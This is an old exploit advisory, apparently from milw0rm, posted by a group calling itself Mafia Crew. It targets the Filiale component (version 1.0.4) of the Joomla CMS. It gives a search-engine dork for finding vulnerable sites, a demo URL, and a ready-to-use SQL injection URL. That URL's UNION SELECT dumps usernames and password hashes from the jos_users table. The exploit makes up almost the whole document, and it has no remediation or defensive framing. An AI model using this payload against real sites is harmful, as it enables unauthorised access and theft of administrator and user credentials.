######################################################################## # # # [ Joomla Component Filiale SQL Injection ] # # # ######################################################################## [ M a f i a C R E W ] ########################################## [~] Vulnerability found by: Str0xo [ Mafia Crew ] [~] Contact: x02[at]hotmail.de [~] Website: http://www.dz-h4ck3rz.com [~] special tnx to: co2 [~] Greetings: [ lina-no promises ] & [ HIs0k4 ] ########################################## [~] ScriptName : 'Joomla' [~] ModuleName : 'Filiale' [~] Version() : 1.0.4 ########################################### [~] [~] DORK 1 : inurl:com_filiale [~] ########################################### [~] [~] [+]Demo : http://www.xxx.be/index.php?option=com_filiale [~] [~] [+]Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users [~] ########################################### # milw0rm.com [2008-04-23]